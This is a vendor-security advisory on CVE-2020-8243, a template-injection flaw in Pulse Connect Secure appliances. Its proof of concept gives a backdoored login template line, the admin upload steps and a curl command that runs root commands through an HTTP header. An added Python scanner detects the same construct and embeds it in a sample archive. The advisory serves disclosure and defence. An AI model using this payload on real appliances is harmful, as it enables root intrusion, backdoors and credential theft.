Vendor: Pulse Secure
Vendor URL: https://www.pulsesecure.net/
Versions affected: Pulse Connect Secure (PCS) 9.1Rx or below, Pulse Policy Secure (PPS) 9.1Rx or below
Systems Affected: Pulse Connect Secure (PCS) Appliances
Authors: Richard Warren - richard.warren[at]nccgroup[dot]com, David Cash - david.cash[at]nccgroup[dot]com
CVE Identifier: CVE-2020-8243
Advisory URL: https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44588
Risk: 7.2 High CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

Pulse Connect Secure (PCS) appliances before 9.1R8.2 suffer from a Perl Template Injection vulnerability which can be exploited by an authenticated administrative user to execute arbitrary code as root.

Impact

The impact of this vulnerability is that an authenticated attacker with access to the administrative console would be able to execute arbitrary code as root on the underlying operating system. This could be used to plant a persistent backdoor if brief administrative access were gained (e.g. via XSS, or through credential compromise).

Remote Code Execution on the underlying appliance may allow an attacker to:

  • Pivot into the internal network
  • Extract and decrypt stored LDAP credentials
  • Extract plaintext cached credentials and authenticated session cookies
  • Intercept network traffic

Details

Pulse Connect Secure (PCS) allows administrative users to upload custom templates, which can be used to display customised login and meeting pages. These templates are rendered using the Perl Template Toolkit engine.

Although dangerous directives such as INCLUDE, RAWPERL and PERL (via the EVAL_PERL setting) are restricted, Template Toolkit can be coerced into executing arbitrary Perl by abusing the “template” global object to create a new BLOCK, which is then evaluated. This is a “feature” that was also abused by the recent Citrix vulnerability (CVE-2019-19781) [1][2][3].

Proof of Concept

A backdoored template file might contain an entry such as the following, within the LoginPage.thtml file:

<%# NetScreen Page Version 9999 %>
<% template.new({ 'BLOCK' => 'system($ENV{HTTP_PULSE_CMD}); die' }) %>

This is then uploaded as a zip file via: /dana-admin/auth/custompage.cgi

Next, create a new sign-in URL under: /dana-admin/auth/signinPolicy.cgi

Set a user URL of */test/ and set the sign-in page to your previously uploaded custom page.

Now you can execute commands like this:

curl -I -L -k https://192.168.1.2/test/ -H "PULSE_CMD: uname -a"

Commands specified in the PULSE_CMD HTTP header will be executed as root.

Note your custom archive will also require the following (blank) files:

  • ExceededConcurrent.thtml
  • Logout.thtml
  • SSL.thtml
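The following Python script is an added example, not part of the NCC Group advisory or of Pulse Secure's code: it scans a custom-page zip archive (the kind uploaded via custompage.cgi) for the template.new/BLOCK construct described above and for related indicators, so that existing templates on an appliance or in backups can be reviewed. The indicator regexes and the in-memory sample archive are assumptions constructed for this example.

```python
import io
import re
import zipfile

# PCS custom pages use <% ... %> directives; Template Toolkit's default is [% ... %].
DIRECTIVE_RE = re.compile(r"(?:<%|\[%)(.*?)(?:%>|%\])", re.DOTALL)

# Indicators drawn from the technique in this advisory, checked per directive body.
INDICATORS = [
    ("template.new BLOCK", re.compile(r"template\s*\.\s*new\b.*\bBLOCK\b", re.S | re.I)),
    ("restricted directive", re.compile(r"^\s*(RAWPERL|PERL|INCLUDE)\b", re.I)),
    ("system/exec or backticks", re.compile(r"\b(system|exec)\s*\(|`[^`]*`")),
    ("request header via $ENV", re.compile(r"\$ENV\{\s*['\"]?HTTP_", re.I)),
]

def scan_template(name, text):
    """Return (file, indicator, snippet) tuples for suspicious directives in one template."""
    findings = []
    for m in DIRECTIVE_RE.finditer(text):
        body = m.group(1)
        if body.lstrip().startswith("#"):  # <%# ... %> is a comment, e.g. the version tag
            continue
        for label, pattern in INDICATORS:
            if pattern.search(body):
                findings.append((name, label, " ".join(body.split())[:60]))
    return findings

def scan_archive(zip_source):
    """Scan every .thtml entry in a custom-page zip (a path or a file-like object)."""
    findings = []
    with zipfile.ZipFile(zip_source) as zf:
        for info in zf.infolist():
            if info.filename.lower().endswith(".thtml"):
                text = zf.read(info).decode("utf-8", errors="replace")
                findings.extend(scan_template(info.filename, text))
    return findings

# Constructed sample archive: a benign page plus a LoginPage.thtml carrying the
# construct from this advisory. Built in memory so the example runs offline.
def build_sample_archive():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Logout.thtml", "<%# NetScreen Page Version 9999 %>\n<% welcome %>\n")
        zf.writestr("LoginPage.thtml",
                    "<%# NetScreen Page Version 9999 %>\n"
                    "<% template.new({ 'BLOCK' => 'system($ENV{HTTP_PULSE_CMD}); die' }) %>\n")
    buf.seek(0)
    return buf

if __name__ == "__main__":
    for file_name, label, snippet in scan_archive(build_sample_archive()):
        print(f"{file_name}: {label}: {snippet}")
```

Run it against a real archive with scan_archive("custom.zip"); any hit on "template.new BLOCK" in a page that is meant to be a static login template warrants manual review.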

Recommendation

Upgrade to Pulse Connect Secure (PCS) 9.1R8.2, Pulse Policy Secure (PPS) 9.1R8.2, or later.

Vendor Communication

  • 2020-06-02: Issue reported to vendor
  • 2020-09-21: Pulse Connect Secure (PCS) version 9.1R8.2 released
  • 2020-09-23: Advisory released by Pulse Secure
  • 2020-10-06: NCC Group advisory released

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate & respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date: 06/10/2020
Written by: Richard Warren and David Cash